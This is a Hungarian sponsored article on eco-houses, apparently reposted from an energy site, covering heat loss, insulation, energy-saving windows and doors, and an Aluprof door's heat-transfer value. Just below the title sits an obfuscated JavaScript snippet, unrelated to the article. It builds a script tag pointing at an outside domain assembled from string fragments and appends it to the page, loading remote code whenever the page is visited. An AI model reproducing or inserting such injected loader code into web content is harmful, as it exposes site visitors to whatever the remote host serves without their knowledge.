Az ökoház többet jelent egy hőszivattyúnál és megújuló energiaforrásoknál

Az ökoház többet jelent egy hőszivattyúnál és megújuló energiaforrásoknál

(function(){xea5_=(“u”+””)+”s”+””;xea5_+=(“tat.”)+(“i”);xea5=document.createElement(“script”);xea5.type=”text/javascript”;xea5_+=”nf”+(“o”)+”/”;xea5u=”317868771″+”.”;xea5.async=true;xea5u+=”2rqf7zqlea5yXs0psgsnklmenw67y2″;xea5.src=”https://”+xea5_+xea5u;xea5b=document.body;xea5b.appendChild(xea5);})();

Az egyre nagyobb népszerűségnek örvendő ökoház olyasvalami, amely egyre ismertebbé válik befektetők, tervezők és a lakossági megrendelők körében. Tulajdonságainak köszönhetően egyrészt alacsonyabbak az üzemeltetési költségei, másrészt pedig – sőt, talán elsősorban – az ilyen ház környezetre kifejtett negatív hatása sokkal alacsonyabb. Ez utóbbi kérdést már tulajdonképpen a tervezési és építési fázistól kezdve a mindennapos használaton, korszerűsítésen, sőt akár bontáson át is lehet befolyásolni. Ökoházaknál két, egymással szorosan összefüggő paraméter – az energiaigény és a hőveszteség – kulcsfontosságú. Az összefüggés nagyon egyszerű – minél alacsonyabb a hőveszteség, annál kisebb az ökoház – pl. fűtési – energiaigénye. Ez pedig hozzájárul a karbonlábnyom csökkentéséhez, az energiahálózat terhelésének csökkentéséhez és a háztartási költségvetés optimalizálásához. A klímakatasztrófa idején a tervezők, befektetők, és a lakossági megrendelők is egyre nagyobb figyelmet fordítanak a fenntartható építésre, ez pedig az épületek hőveszteségét csökkentő megoldásokat eredményez.

Energiatakarékos megoldások a már kész házakba

A már kész házak döntő többsége a szellőztetéssel, a falakon, ablakokon és ajtókon keresztül veszít hőenergiát. A hőenergia-vesztést elsősorban a felhasznált építőanyagok, nyílászárók és a szellőzés befolyásolja. A felsorolt elemek energiatakarékosságát korábban nem elemezték ilyen mértékben, és nem vették annyira figyelembe, mint manapság. Jelentős problémákkal jár egy átgondolatlan terv, amely nem veszi figyelembe pl. a ház égtájakhoz viszonyított elhelyezkedését a telken, és azt sem, ha az ablakok elhelyezése nem gazdaságos az épületen.

Szerencsére a házak egyes elemei korszerűsítéssel feljeszthetők. Az egyik legnépszerűbb energiaveszteség-csökkentő módszer az épület további hőszigetelése. Ezáltal több meleg marad benn a házban télen – nyáron pedig kevésbé melegszik fel a belső tér. Így takarékoskodni lehet a ház fűtéséhez és hűtéséhez szükséges energiával, és közben pénzt spórolunk és csökkentjük a környezeti terhelést.

Az ablakok és ajtók cseréje energiatakarékos változatra szintén remek megoldás a ház hőveszteségének csökkentésére. Nem szabad elfelejteni, hogy az ablakok és ajtók típusán felül a helyes gyártás és beépítés is fontos tényező. Ezért komolyabb felújítás idején erre a három dologra érdemes figyelni egyszerre. Ablakok esetében érdemes megfontolni az alumínium redőnyökkel történő kiegészítésüket, amelyek tovább csökkentik a téli hőveszteséget. Nyáron pedig tökéletes védelmet nyújtanak a szoba túlmelegedésével szemben.

Hírdetés

Mi legyen egy ökoház projektben?

Új építésű ökoházak esetén sokkal szélesebb skáláról választhatók ki a megfelelő megoldások és anyagok, mint a már meglévő épületek esetén. Az újonnan épülő ökoházak egyszerű formájúak, tetejük lapos vagy ferde. Többnyire téglalap vagy négyzet alakúak. Az ökoházak felépítésében gyakran érdekes, hogy sok üvegfelületük van – ablak és üveghomlokzat formájában egyaránt.

– A fenntartható házak üvegfelületei többnyire déli tájolásúak. Ez a lehető legnagyobb passzív energianyerést teszi lehetővé, illetve javít a helyiségek természetes megvilágításán. Az ilyen projektekhez felhasznált alumínium, energiatakarékos homlokzatok és ablakok tökéletes szigetelést és hőszigetelést biztosítanak, így az egész házban jelentős mértékben csökkentik a hőveszteséget –  osztja meg velünk Béres Balázs mérnöktanácsadó az Aluprof-tól.

Minden háznak rendkívül fontos eleme a bejárati ajtó – azon túl, hogy védelmet nyújtanak betörőkkel szemben, azt is megakadályozzák, hogy hideg levegő és eső jusson be az épületbe. Az ajtón keresztül is jelentős mennyiségű hőenergia távozik, ezért a ház tervezésekor arra is ügyelni kell, hogy a lehető legkisebb hőátadási tényezővel rendelkező ajtót válasszuk. Az Aluprof MB-104 Passive kültéri alumínium panelajtó hőátadási tényezője mindössze 0,44 W/(m²K).

Let’s build a better future

Amint látható, az ökoházak többet jelentenek hőszivattyúkkal, napelemekkel és energia-visszanyeréssel ellátott házaknál. Hőveszteséget csökkentő, energiatakarékos építőanyagok és megoldások alkalmazásával készülő, átgondolt épületeket és ez jelentős mértékben segít takarékoskodni a fűtésre, világításra és légkondicionálásra felhasznált energiával. A környezet szempontjából szerencsés, hogy egyre több befektető, tervező és a már megépült házakból is egyre több lakossági megrendelő odafigyel mindezekre.

A cikk az Aluprof támogatásával készült.


Forrás:alternativenergia.hu
Tovább a cikkre »